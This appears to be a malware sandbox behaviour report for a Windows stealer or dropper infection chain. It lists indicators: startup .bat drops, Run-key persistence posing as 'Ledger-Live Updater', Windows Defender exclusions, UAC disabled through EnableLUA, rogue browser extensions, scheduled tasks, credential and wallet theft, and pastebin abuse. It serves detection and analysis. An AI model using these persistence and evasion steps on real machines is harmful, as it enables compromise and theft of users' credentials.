Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1346.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yjE7yT7UVOSceR9MaY75fPuX.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QBUMczUi2Pf941DefaINrAvS.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TI15w0gLkpZoqvO6wRGoe3gP.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TUo7DmsI28Drtz3mNGD5uOAu.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oGaKBCTfWiLMwW1zKMcIP3rc.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IKiCs9k3lloeS5vcLyYa2j1X.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\v9CupCzEBDEI1PrvrnKsTxy1.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\u4WujRaZGRrpshjaTNeyFxoy.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\IglGrnQY4KjxY4ESkNLr1P49.exe N/A
N/A N/A C:\Users\Admin\Pictures\YcZF7SNXvFMc37DYXI3ziUaW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7K59T.tmp\IglGrnQY4KjxY4ESkNLr1P49.tmp N/A
N/A N/A C:\Users\Admin\Pictures\MjaQmNnsQNMq8m3PWjNhbwcJ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\syncUpd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Lina Text\linatext.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Lina Text\linatext.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe N/A
N/A N/A C:\Users\Admin\Pictures\HaHE4yGhKaVOdJY4tH9U0wE2.exe N/A
N/A N/A C:\Users\Admin\Pictures\mqJpRwpbfK974CI6kSx5DDx3.exe N/A
N/A N/A C:\Users\Admin\Pictures\POWMHemIAdhWqbG9WwO5wEor.exe N/A
N/A N/A C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe N/A
N/A N/A C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\UzSZFMWFpthvMvdZfvnxrxs2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86E3.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe N/A
N/A N/A C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8CBF.tmp\Install.exe N/A
N/A N/A C:\ProgramData\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33945c4f34\Dctooux.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GDGIJECGDG.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403150201431\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403150201431\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403150201431\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1346.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1346.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\313E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1346.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1346.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH\cTmyoaxliqPIUed\BZzGTBs.exe N/A
N/A N/A C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads data files stored by FTP clients

spyware stealer

Reads local data of messenger clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
22 matches recorded; the sandbox attached no description, indicator, process or target to any of them.

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 91.211.247.248 N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe = "0" C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ledger-Live Updater = "C:\\Users\\Admin\\AppData\\Local\\Temp\\GDGIJECGDG.exe" C:\Users\Admin\AppData\Local\Temp\GDGIJECGDG.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\a0e81e80-45cc-4456-972b-e9d648d8e4bd\\1346.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\1346.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe N/A

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_A2CFFC3C54D475112D9FC5039EB0095F C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_F335A0F859C450629B87083CAA1DC971 C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS8CBF.tmp\Install.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D4579ED561AFE0AD26F688A8C9A41CC6 C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_F335A0F859C450629B87083CAA1DC971 C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\Pictures\mqJpRwpbfK974CI6kSx5DDx3.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_08872284D8414653D8A6B617C1164F2D C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_08872284D8414653D8A6B617C1164F2D C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH\cTmyoaxliqPIUed\BZzGTBs.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D4579ED561AFE0AD26F688A8C9A41CC6 C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\ProgramData\Google\Chrome\updater.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH\cTmyoaxliqPIUed\BZzGTBs.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_A2CFFC3C54D475112D9FC5039EB0095F C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File created C:\Program Files (x86)\FgzgbZZAFicU2\NSJEWZYheTYvn.dll C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File created C:\Program Files (x86)\qeprHDpCnlqFkbDgwPR\PIalxcO.xml C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File created C:\Program Files (x86)\PnlHXrUXYeUn\haoQxrd.dll C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File created C:\Program Files (x86)\FgzgbZZAFicU2\tzpDtvt.xml C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File created C:\Program Files (x86)\xWNndLwYWxPLC\ZveOxSt.dll C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File created C:\Program Files (x86)\xWNndLwYWxPLC\JAwGJlf.xml C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File created C:\Program Files (x86)\LYowOqXOU\SEZhTv.dll C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File created C:\Program Files (x86)\LYowOqXOU\qwhXIaI.xml C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File created C:\Program Files (x86)\qeprHDpCnlqFkbDgwPR\EzmnMyU.dll C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\imJjYhUpaoZYZHtqO.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\PrqbyCvyRaPTCyA.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\ovLFxavpEMJUeWygf.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\Dctooux.job C:\Users\Admin\Pictures\HaHE4yGhKaVOdJY4tH9U0wE2.exe N/A
File created C:\Windows\Tasks\bnTqljwkAIckBwCXiX.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

NSIS installer

installer
1 match recorded; the sandbox attached no description, indicator, process or target to it.

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\Pictures\YcZF7SNXvFMc37DYXI3ziUaW.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\Pictures\YcZF7SNXvFMc37DYXI3ziUaW.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\Pictures\YcZF7SNXvFMc37DYXI3ziUaW.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\syncUpd.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\syncUpd.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS8CBF.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS8CBF.tmp\Install.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
